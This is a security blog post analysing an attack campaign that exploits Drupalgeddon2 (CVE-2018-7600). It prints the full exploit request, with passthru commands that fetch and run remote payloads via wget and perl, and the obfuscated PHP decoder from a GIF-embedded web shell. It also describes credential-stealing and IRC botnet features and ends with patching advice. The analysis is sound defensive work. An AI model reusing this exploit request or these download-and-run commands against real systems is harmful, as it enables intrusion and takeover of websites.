Drupalgeddon2 still used in attack campaigns

While examining Akamai's network attack logs, I noticed an attack campaign leveraging Drupalgeddon2. Drupalgeddon2 is an unauthenticated remote code execution vulnerability (CVE-2018-7600) in the Drupal CMS platform that was patched in March 2018.

I observed an attack that  is designed to run code that is embedded inside a .gif file. While embedding code in image file isn't a new attack method, I haven't seen this method in quite some time. 

The attack traffic doesn't appear to be widespread at this time, nor does it appear to be specifically targeting a single industry vertical. Currently, the attack traffic seems to be directed towards a random assortment of high profile websites.

The code I will be examining is embedded in the file index.inc.gif, which appears to be hosted on a compromised bodysurfing website located in Brazil.  A closer look at the request in the logs on my system shows the commands they're attempting to execute: REDACTED /

q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=chmod%20-R%20755%20.;mv%20.htaccess%20htx;rm%20-fr%20*php.*;wget%20http://REDACTED/media/favicon/index.inc.gif%20-O%20index.old.php;cd%20sites/default/files/;chmod%20-R%20755%20.;rm%20-fr%20.htaccess;wget%20http://REDACTED/media/favicon/index.inc.gif%20-O%20index.old.php;wget%20http://REDACTED/media/favicon/ht2%20-O%20.htaccess;cd%20/tmp;wget%20http://REDACTED/media/favicon/mild.txt%20-O%20mild.txt;perl%20mild.txt;rm%20-fr%20mild* Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31

The request above has the following commands being passed to the passthru() function:


1. chmod -R 755 .;

2. mv .htaccess htx;

3. rm -fr *php.*;

4. wget http://REDACTED/media/favicon/index.inc.gif -O index.old.php;

5. cd sites/default/files/;chmod -R 755 .;

6. rm -fr .htaccess;

7. wget http://REDACTED/media/favicon/index.inc.gif -O index.old.php;

8. wget http://REDACTED/media/favicon/ht2 -O .htaccess; cd /tmp;

9. wget http://REDACTED/media/favicon/mild.txt -O mild.txt;perl mild.txt;

10. rm -fr mild*

The commands clean up any previous installations and then replace any .htaccess configurations with versions that have less restrictive settings. Then two different files are downloaded and then executed. The first, index.inc.gif, contains obfuscated PHP code. It contains a GIF header, but the rest of the file is PHP code obscured using gzip compression, rot13, and base64 encoding. The Linux command file identifies it as a gif image.

$ file index.inc.gif

index.inc.gif: GIF image data, version 89a, 16129 x 16129

$ sha256sum index.inc.gif

e18bf4ddee0b0db77541f3a3ea52d3bbe8fa943dd0ca3f573572fea22533afbe index.inc.gif 

Examining the PHP code we find a block of gz compressed and base64 encoded data.



And an array of characters used in a substitution cipher:

$eAdLdAa = array('C','P','Q','T','U','M','V','h','E','L','l','0','K','8','C','l','a','U','D','e','4','I','m','1','5','s','b','R','Y','O','u','W','X','Z','+','c','@','d','3','r','F',')','B','y','C','J','q','G','#','S','o','H','4','A','i','j','t','v','w','x','z','g','%','(','$','_','+','2','x','(','f','6','j','k','n','p','*','9','N','1','3','3','7',';'); 

And then the PHP code to build the command string to decode the malware block:

$ccUdcaL = $eAdLdAa[29].$eAdLdAa[56].$eAdLdAa[23].$eAdLdAa[80].$eAdLdAa[63].$eAdLdAa[61].$eAdLdAa[3 3].$eAdLdAa[21].$eAdLdAa[74].$eAdLdAa[40]; $AAiio = $eAdLdAa[8].$eAdLdAa[57].$eAdLdAa[53].$eAdLdAa[15].$eAdLdAa[63].$eAdLdAa[49].$eAdLdAa[56]. $eAdLdAa[27].$eAdLdAa[65].$eAdLdAa[39]; $AAiSo = $eAdLdAa[9].$eAdLdAa[53].$eAdLdAa[56].$eAdLdAa[19].$eAdLdAa[69].$eAdLdAa[42].$eAdLdAa[16]. $eAdLdAa[25].$eAdLdAa[19].$eAdLdAa[71]; $Aecddad = $eAdLdAa[15].$eAdLdAa[53].$eAdLdAa[56].$eAdLdAa[8].$eAdLdAa[69].$eAdLdAa[25].$eAdLdAa[3] .$eAdLdAa[39].$eAdLdAa[65].$eAdLdAa[39]; $cdaeLAL = $eAdLdAa[20].$eAdLdAa[65].$eAdLdAa[18].$eAdLdAa[8].$eAdLdAa[0].$eAdLdAa[29].$eAdLdAa[37] .$eAdLdAa[19].$eAdLdAa[63]; $AHAAo = $eAdLdAa[29].$eAdLdAa[56].$eAdLdAa[23].$eAdLdAa[80].$eAdLdAa[63].$eAdLdAa[47].$eAdLdAa[60] .$eAdLdAa[54].$eAdLdAa[74].$eAdLdAa[40]; $oSSHo = $AAiio.$ccUdcaL.$Aecddad.$AHAAo.$AAiSo.$cdaeLAL.'$SSooA'.$eAdLdAa[41].$eAdLdAa[41].$eAdLdA a[41].$eAdLdAa[41].$eAdLdAa[41].$eAdLdAa[41].$eAdLdAa[83];return EvAl($oSSHo); 

The highlighted code evaluates the below command to decode the base64 encoded malware stored in the $database variable:


After the str_rot13, base64_decode, gzinflate decoding and then execution by the eval() function, the malware contains multiple functions hiding behind a typical defacement page. 


Supplying a GET or a POST request with the following parameters opens up some obscure functionality built into the defacement page. While the functionality is obscured on the server-side, there are no fields or form inputs client-side to hide these other abilities in the malware. I have created a table below to describe the required request parameters for each function.


Features and Functions

Request Type





Scan local files for credentials



Send email with credentials



Replace .htaccess file



Display MySQL my.cnf configuration files 



Execute a remote file that is gz compressed and base64 encoded



Show system information like uid/uname -a



Web shell (broken) / File upload



Web shell



Web shell



Rename files

For example, a request with the query string "?shx=uptime;uname%20-a" the UNIX commands to display system uptime and kernel version results in the following output:



The second piece of malware found in the attack is stored in mild.txt. The file contains a Perl script. The code isn't obfuscated, and like many other pieces of malware, uses Internet Relay Chat (IRC) to handle the command and control structure. It has various features such as (D)DoS and RAT functionality. It is configured to connect to a now defunct IRC server and to join the channel #FULLMAGIC[ where it can receive commands.  This piece of code has been widely shared and modified by the criminal Internet underground.

$ file mild.txt

mild.txt: a /usr/bin/perl script executable (binary data)

$ shasum mild.txt

0ef7f63d746c34819d21057bd58b02781777bb29 mild.txt



As you can see in the above image, there are various tools to attack, gather information, and control the infected host. Among the more interesting commands is the SQL flood command.  It simply sends generic HTTP GET / requests to mysql's default port of 3306 on the specified target. 


Critical vulnerabilities will be targeted, even if their public disclosure date is over a year old. When the vulnerability's exploitation is simple, which is the case with Drupalgeddon2, attackers will automate the process of scanning, exploitation, and infection when there are poorly maintained and forgotten systems. This creates a problem for enterprise operations and web administrators, as these old forgotten installs are often connected to other critical systems -- creating a pivot point on the network.

Maintaining patches in a timely fashion, as well as properly decommissioning servers if they're no longer being used is the best preventative measure that administrators and security teams can take. 


Article Link: https://blogs.akamai.com/sitr/2019/10/drupalgeddon2-still-used-in-attack-campaigns.html